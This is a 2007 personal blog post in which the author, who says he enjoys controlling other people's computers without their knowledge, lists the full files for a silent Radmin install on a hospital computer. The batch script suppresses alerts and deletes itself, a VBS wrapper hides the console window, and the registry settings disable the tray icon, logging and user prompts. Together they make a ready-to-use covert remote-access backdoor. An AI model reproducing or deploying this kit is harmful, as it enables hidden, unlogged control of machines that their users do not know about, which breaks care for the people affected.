LINUKS BLOG

Make progress is the topic for ever...

My Photo
Name:
Location: China

It's a fans of computer/ Computer is my favorite/ Making progress is the topic for ever...

Tuesday, January 09, 2007

Install radmin for the computer

I like remote-ctrol,since i touch the computer.Because it will produce the feeling of hack.
At the begainning,use the BinHe to control the neignboring computer in the Internet cafe.Like the feeling to control others without their attention.More,to pursuse the technology of Internet.
Today,I want to install a radmin for the computer in the hospital.The goal is that to decrease degree of the difficulty in the job:
All files:Admdll.dll,raddrv.dll ,r_server.exe(These are the neccessory file of the server),install.bat,system.reg,r_server.vbs(These are the file I wrote.)
Introduce the content of the file i wrote.
install.bat:
@echo off //Disable show command to user
regedit /s system.reg //The set of the r_server.exe's registry
r_server /install
r_server /pass:******* /s
r_server /save /s
r_server /silence //Disable the alert
r_server /start
del system.reg
del r_server.vbs
del install.bat
exit
r_server.vbs:  //Use it to remove the black window of the cmd
Set ws=CreateObject("Wscript.Shell")
ws.run "cmd /c install.bat",vbhide
system.reg:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
"0"=hex:31,39,32,2e,31,36,38,2e,30,2e,30,00,66,94,ef,77,ce,07,01,03,32,35,35,\
2e,32,35,35,2e,32,35,35,2e,30,00,00,00,00,00,00,00,c0,a8,00,00,ff,ff,ff,00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:cd,4b,d5,eb,87,d2,6c,95,bc,97,e6,db,dd,b0,0a,7c
"Port"=hex:23,13,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00 //Disable the icon in the taskbar
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00


--
Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.

0 Comments:

Post a Comment

<< Home